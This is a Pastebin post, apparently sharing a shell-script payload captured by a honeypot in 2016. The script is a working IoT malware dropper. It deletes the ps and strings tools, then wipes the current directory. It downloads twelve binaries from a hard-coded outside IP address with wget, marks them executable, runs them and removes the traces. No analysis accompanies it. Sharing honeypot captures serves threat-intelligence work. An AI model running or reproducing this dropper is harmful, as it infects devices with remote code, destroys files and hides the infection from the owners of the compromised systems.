Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-06-22 21:28

Jun 22nd, 2016
193
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.16 KB | None | 0 0
  1. #!/bin/sh
  2.  
  3. busybox rm -f /usr/bin/strings || rm -f /usr/bin/strings
  4. busybox rm -f /usr/bin/ps || rm -f /usr/bin/ps
  5. busybox rm -f bin.sh bin.sh.* || rm -f bin.sh bin.sh.*
  6.  
  7. busybox rm -f * || rm -f *
  8. busybox wget http://167.114.85.109/1 || wget http://167.114.85.109/1
  9. busybox wget http://167.114.85.109/2 || wget http://167.114.85.109/2
  10. busybox wget http://167.114.85.109/3 || wget http://167.114.85.109/3
  11. busybox wget http://167.114.85.109/4 || wget http://167.114.85.109/4
  12. busybox wget http://167.114.85.109/5 || wget http://167.114.85.109/5
  13. busybox wget http://167.114.85.109/6 || wget http://167.114.85.109/6
  14. busybox wget http://167.114.85.109/7 || wget http://167.114.85.109/7
  15. busybox wget http://167.114.85.109/8 || wget http://167.114.85.109/8
  16. busybox wget http://167.114.85.109/9 || wget http://167.114.85.109/9
  17. busybox wget http://167.114.85.109/10 || wget http://167.114.85.109/10
  18. busybox wget http://167.114.85.109/11 || wget http://167.114.85.109/11
  19. busybox wget http://167.114.85.109/12 || wget http://167.114.85.109/12
  20.  
  21. busybox chmod +x * || chmod +x *
  22. ./1 || ./2 || ./3 || ./4 || ./5 || ./6 || ./7 || ./8 || ./9 || ./10 || ./11 || ./12
  23. busybox rm -f * || rm -f *
  24. sleep 1
  25. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement